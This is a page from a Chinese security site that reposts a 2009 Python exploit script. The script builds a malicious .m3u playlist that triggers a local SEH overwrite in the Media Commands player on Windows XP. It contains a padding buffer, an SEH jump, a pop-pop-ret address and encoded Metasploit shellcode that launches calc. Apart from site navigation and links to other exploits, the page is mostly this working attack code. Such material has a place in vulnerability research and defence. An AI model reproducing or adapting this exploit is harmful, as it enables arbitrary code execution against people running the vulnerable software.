首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Media Commands (m3u File) Local SEH Overwrite Exploit
来源:www.vfcocus.net 作者:His0k4 发布时间:2009-03-03  
#usage: exploit.py
print "**************************************************************************"
print " Media Commands (m3u File) local Seh Overwrite Exploit\n"
print " Founder: Hakxer"
print " Exploited: His0k4"
print " Tested on: Windows XP Pro SP2 Fr\n"
print " Greetings to:"
print " All friends & muslims HaCkers(dz)\n"
print "**************************************************************************"
        



buff = "\x41" * 4103

next_seh = "\xEB\x06\x90\x90"

seh = "\x35\x2F\xC6\x72" #pop pop ret msacm32.drv

nop = "\x90" * 19

# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"
"\x42\x50\x42\x50\x42\x50\x4b\x38\x45\x54\x4e\x53\x4b\x38\x4e\x47"
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x48\x4f\x34\x4a\x41\x4b\x58"
"\x4f\x35\x42\x42\x41\x50\x4b\x4e\x49\x54\x4b\x38\x46\x43\x4b\x58"
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c"
"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x45\x46\x42\x46\x50\x45\x37\x45\x4e\x4b\x38"
"\x4f\x45\x46\x32\x41\x30\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x54"
"\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x58"
"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x50\x43\x4c\x41\x33"
"\x42\x4c\x46\x36\x4b\x48\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x37"
"\x4e\x50\x4b\x38\x42\x54\x4e\x50\x4b\x48\x42\x57\x4e\x51\x4d\x4a"
"\x4b\x38\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"
"\x42\x30\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x33\x4f\x35\x41\x43"
"\x48\x4f\x42\x56\x48\x55\x49\x38\x4a\x4f\x43\x38\x42\x4c\x4b\x47"
"\x42\x35\x4a\x46\x42\x4f\x4c\x38\x46\x30\x4f\x55\x4a\x36\x4a\x49"
"\x50\x4f\x4c\x58\x50\x30\x47\x55\x4f\x4f\x47\x4e\x50\x36\x4f\x46"
"\x46\x47\x45\x56\x42\x57\x41\x56\x46\x56\x42\x30\x5a"
    )

exploit = buff + next_seh + seh + nop + shellcode

try:
    out_file = open("exploit.m3u",'w')
    out_file.write(exploit)
    out_file.close()
    print "Exploit File Created!"
except:
    print "Error"

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Media Commands (M3U,M3l,TXT,LR
·VUplayer 2.49 .CUE File Local
·Joomla com_digistore (pid) Bli
·Internet Download Manager 5.15
·Novell eDirectory iMonitor (Ac
·EFS Easy Chat Server Authentic
·Merak Media PLayer 3.2 m3u Fil
·Sopcast SopCore Control (sopoc
·HTC Touch vCard over IP Denial
·Imera ImeraIEPlugin ActiveX Co
·Yaws < 1.80 (multiple headers)
·POP Peeper version 3.4.0.0 UID
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved